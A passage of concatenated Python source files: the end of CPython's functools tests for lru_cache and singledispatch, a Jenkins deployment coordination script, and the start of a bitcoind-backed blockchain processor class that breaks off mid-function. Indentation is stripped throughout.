self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: Why can be not equal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
@unittest.skipUnless(threading, 'This test requires threading.')
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_early_detection_of_bad_call(self):
# Issue #22184
with self.assertRaises(TypeError):
@functools.lru_cache
def f():
pass
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping, c.Sized,
c.Iterable, c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, c.OrderedDict]
for haystack in permutations(bases):
m = mro(c.ChainMap, haystack)
self.assertEqual(m, [c.ChainMap, c.MutableMapping, c.Mapping,
c.Sized, c.Iterable, c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(c.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [c.defaultdict, dict, c.Sized, c.Container,
object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(c.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence,
c.defaultdict, dict, c.MutableMapping,
c.Mapping, c.Sized, c.Reversible, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(c.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, c.defaultdict, dict, c.Mapping,
c.Sized, c.Iterable, c.Container, object])
def test_register_abc(self):
c = collections
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(c.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(c.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
_orig_wkd = functools.WeakKeyDictionary
td = TracingDict()
functools.WeakKeyDictionary = lambda: td
c = collections
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
functools.WeakKeyDictionary = _orig_wkd
if __name__ == '__main__':
unittest.main()
|
coordinate_script.py
|
#!/usr/bin/python
"""
"""
import os
#import sys
import ConfigParser
# import subprocess
import logging
import logging.handlers
import socket
import time
# import glob
import threading
# ####################################### Start of Classes ##########################################
class getProps(object):
# ---------------------------------------------------------------------------------------------------
# getProps - Gets parameters for this script from:
# OS, Job Submission, Jenkins Coordinate Property File, Server Property File
# ---------------------------------------------------------------------------------------------------
def __init__(self):
logger.debug('Got Properties For: ' + os.environ.get('JOB_NAME'))
self.globalErrorCode = 0
#-----------------------------------------------------------------------------------------
# OS Properties (From the Jenkins Job Submission and Jenkins Environment)
#-----------------------------------------------------------------------------------------
self.hostname = socket.getfqdn()
self.nodeName = os.environ.get('NODE_NAME')
self.workspace = os.environ.get('WORKSPACE')
self.jobname = os.environ.get('JOB_NAME')
self.ops_env = self.jobname.split("_")[0]
self.CustomerEnvironment = os.environ.get('Customer_Environment')
self.custEnvProps = self.ops_env + '_Customer_Environments.properties'
#Deploy Parameters
self.ReleaseBuildName = os.environ.get('Release_Build_Name')
if self.ReleaseBuildName is None:
self.ReleaseBuildName = ''
# Print OS/Submission Properties
logger.debug('Hostname'.ljust(msgFiller,' ') + '= ' + self.hostname)
logger.debug('NODE_NAME'.ljust(msgFiller,' ') + '= ' + self.nodeName)
logger.debug('Workspace'.ljust(msgFiller,' ') + '= ' + self.workspace)
logger.debug('operating Environment'.ljust(msgFiller, ' ') + '= ' + self.ops_env)
logger.info('CustomerEnvironment'.ljust(msgFiller,' ') + '= ' + self.CustomerEnvironment)
if (self.ReleaseBuildName != ''):
logger.info('ReleaseBuildName'.ljust(msgFiller,' ') + '= ' + self.ReleaseBuildName)
# -----------------------------------------------------------------------------------------
# Global Environment Properties (parameters that are common to all environments)
# -----------------------------------------------------------------------------------------
# cp = ConfigParser.ConfigParser()
# coordinatePropsFName = self.workspace + '/Coordinate.properties'
# logger.debug('Coordinate_Properties'.ljust(msgFiller, ' ') + '= ' + coordinatePropsFName)
# cp.read(coordinatePropsFName)
#
# self.mailhost = cp.get('main', 'mailhost')
#
# # Print Global Properties Main
# logger.debug('mailhost'.ljust(msgFiller,' ') + '= ' + self.mailhost)
# logger.debug('custEnvProps'.ljust(msgFiller,' ') + '= ' + self.custEnvProps)
# logger.info('appProduct'.ljust(msgFiller,' ') + '= ' + appProduct)
# -----------------------------------------------------------------------------------------
# Specific Server Properties for the Customer Environment(TSM/UAT/PROD)
# -----------------------------------------------------------------------------------------
cp1 = ConfigParser.ConfigParser()
CustEnvPropsFName = self.workspace + '/' + self.custEnvProps
logger.debug('CustEnv Properties'.ljust(msgFiller, ' ') + '= ' + CustEnvPropsFName)
cp1.read(CustEnvPropsFName)
self.servers = cp1.get(self.CustomerEnvironment, 'servers').split(',')
try:
self.tomcatHome = cp1.get(self.CustomerEnvironment, 'tomcatHome')
except ConfigParser.Error:
self.tomcatHome = ''
try:
self.appHostPort = cp1.get(self.CustomerEnvironment, 'appHostPort')
except ConfigParser.Error:
self.appHostPort = ''
logger.info('servers'.ljust(msgFiller,' ') + '= ' + str(self.servers))
logger.debug('tomcatHome'.ljust(msgFiller,' ') + '= ' + self.tomcatHome)
logger.debug('appHostPort'.ljust(msgFiller,' ') + '= ' + self.appHostPort)
logger.info(' ')
return
# ####################################### End of Classes ############################################
# ####################################### Start of Functions ########################################
def appDeploy(hostname):
logger.info(hostname + ': deploy ' + appProduct)
# ####################################### Start of Main #############################################
def main():
# ---------------------------------------------------------------------------------------------------
# main - sets logging and coordinates this scripts processing.
# ---------------------------------------------------------------------------------------------------
global logger
global props
global appProduct
global logPrefix
global msgPrefix
global msgFiller
msgPrefix = '***** '
msgFiller = 25
#---------------------------------------------------------------------------------------------------
# Setup Logger and other Variables for this script
#---------------------------------------------------------------------------------------------------
customerEnvironment = os.environ.get('Customer_Environment')
if customerEnvironment.rfind('_') != -1:
idx = customerEnvironment.rfind('_') + 1
appProduct = customerEnvironment[idx:]
else:
appProduct = 'NA'
logPrefix = customerEnvironment.replace('_','-')
#Set Logger
logger = logging.getLogger('__name__')
logger.setLevel(logging.DEBUG)
nowtime = time.strftime("%Y-%m-%d-%H%M%S", time.localtime())
jenkinsLogDebug = os.environ.get('WORKSPACE') + '/' + logPrefix + '-jenkinsLogDebug-' + nowtime + '.log'
jenkinsLogInfo = os.environ.get('WORKSPACE') + '/' + logPrefix + '-jenkinsLogInfo-' + nowtime + '.log'
outformat = logging.Formatter('%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
fh = logging.FileHandler(jenkinsLogDebug)
fh.setLevel(logging.DEBUG)
fh.setFormatter(outformat)
logger.addHandler(fh)
fh1 = logging.FileHandler(jenkinsLogInfo)
fh1.setLevel(logging.INFO)
fh1.setFormatter(outformat)
logger.addHandler(fh1)
# Jenkins Job Console Output
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
ch.setFormatter(outformat)
logger.addHandler(ch)
logger.info(msgPrefix)
logger.info(msgPrefix + 'START - Jenkins Job: ' + os.environ.get('JOB_NAME'))
logger.info(msgPrefix)
logger.debug('logPrefix = ' + logPrefix)
logger.debug('appProduct = ' + appProduct)
#---------------------------------------------------------------------------------------------------
# Get Properties/Paramters for the requested job
#---------------------------------------------------------------------------------------------------
props = getProps()
props.appProduct = appProduct
props.jenkinsLogDebug = jenkinsLogDebug
props.jenkinsLogInfo = jenkinsLogInfo
props.globalErrorCode = 0
props.logfilelist = []
msgProduct = appProduct
for singleserver in props.servers:
logger.info(' ')
t = threading.Thread(target=appDeploy, args=(singleserver,))
t.start()
t.join()
logger.info(msgPrefix)
logger.info(msgPrefix + 'END - Jenkins Job: ' + os.environ.get('JOB_NAME'))
logger.info(msgPrefix)
#---------------------------------------------------------------------------------------------------
# Execute MAIN CODE
#---------------------------------------------------------------------------------------------------
if __name__ == '__main__':
try:
main()
except Exception as e:
print 'Raise error'
raise
|
blockchain_processor.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from json import dumps, load
import os
from Queue import Queue
import random
import sys
import time
import threading
import urllib
#from calendar import timegm
#from time import strptime
#from datetime import datetime
import deserialize
from processor import Processor, print_log
from storage import Storage
from utils import logger, hash_decode, hash_encode, Hash, HashX13, header_from_string, header_to_string, ProfiledThread, \
rev_hex, int_to_hex4
import traceback
class BlockchainProcessor(Processor):
def __init__(self, config, shared):
Processor.__init__(self)
# monitoring
self.avg_time = 0,0,0
self.time_ref = time.time()
self.shared = shared
self.config = config
self.up_to_date = False
self.watch_lock = threading.Lock()
self.watch_blocks = []
self.watch_headers = []
self.watched_addresses = {}
self.history_cache = {}
self.merkle_cache = {}
self.max_cache_size = 100000
self.chunk_cache = {}
self.cache_lock = threading.Lock()
self.headers_data = ''
self.headers_path = config.get('leveldb', 'path')
self.mempool_fees = {}
self.mempool_values = {}
self.mempool_addresses = {}
self.mempool_hist = {} # addr -> (txid, delta)
self.mempool_unconfirmed = {} # txid -> set of unconfirmed inputs
self.mempool_hashes = set()
self.mempool_lock = threading.Lock()
self.address_queue = Queue()
try:
self.test_reorgs = config.getboolean('leveldb', 'test_reorgs') # simulate random blockchain reorgs
except:
self.test_reorgs = False
self.storage = Storage(config, shared, self.test_reorgs)
self.bitcoind_url = 'http://%s:%s@%s:%s/' % (
config.get('bitcoind', 'bitcoind_user'),
config.get('bitcoind', 'bitcoind_password'),
config.get('bitcoind', 'bitcoind_host'),
config.get('bitcoind', 'bitcoind_port'))
self.sent_height = 0
self.sent_header = None
# catch_up headers
self.init_headers(self.storage.height)
# start catch_up thread
if config.getboolean('leveldb', 'profiler'):
filename = os.path.join(config.get('leveldb', 'path'), 'profile')
print_log('profiled thread', filename)
self.blockchain_thread = ProfiledThread(filename, target = self.do_catch_up)
else:
self.blockchain_thread = threading.Thread(target = self.do_catch_up)
self.blockchain_thread.start()
def do_catch_up(self):
self.header = self.block2header(self.bitcoind('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
self.catch_up(sync=False)
if not self.shared.stopped():
print_log("Blockchain is up to date.")
self.memorypool_update()
print_log("Memory pool initialized.")
while not self.shared.stopped():
self.main_iteration()
if self.shared.paused():
print_log("bitcoind is responding")
self.shared.unpause()
time.sleep(10)
def set_time(self):
self.time_ref = time.time()
def print_time(self, num_tx):
delta = time.time() - self.time_ref
# leaky averages
seconds_per_block, tx_per_second, n = self.avg_time
alpha = (1. + 0.01 * n)/(n+1)
seconds_per_block = (1-alpha) * seconds_per_block + alpha * delta
alpha2 = alpha * delta / seconds_per_block
tx_per_second = (1-alpha2) * tx_per_second + alpha2 * num_tx / delta
self.avg_time = seconds_per_block, tx_per_second, n+1
if self.storage.height%100 == 0 \
or (self.storage.height%10 == 0 and self.storage.height >= 100000)\
or self.storage.height >= 200000:
msg = "block %d (%d %.2fs) %s" %(self.storage.height, num_tx, delta, self.storage.get_root_hash().encode('hex'))
msg += " (%.2ftx/s, %.2fs/block)" % (tx_per_second, seconds_per_block)
run_blocks = self.storage.height - self.start_catchup_height
remaining_blocks = self.bitcoind_height - self.storage.height
if run_blocks>0 and remaining_blocks>0:
remaining_minutes = remaining_blocks * seconds_per_block / 60
new_blocks = int(remaining_minutes / 10) # number of new blocks expected during catchup
blocks_to_process = remaining_blocks + new_blocks
minutes = blocks_to_process * seconds_per_block / 60
rt = "%.0fmin"%minutes if minutes < 300 else "%.1f hours"%(minutes/60)
msg += " (eta %s, %d blocks)" % (rt, remaining_blocks)
print_log(msg)
def wait_on_bitcoind(self):
self.shared.pause()
time.sleep(10)
if self.shared.stopped():
# this will end the thread
raise BaseException()
def bitcoind(self, method, params=()):
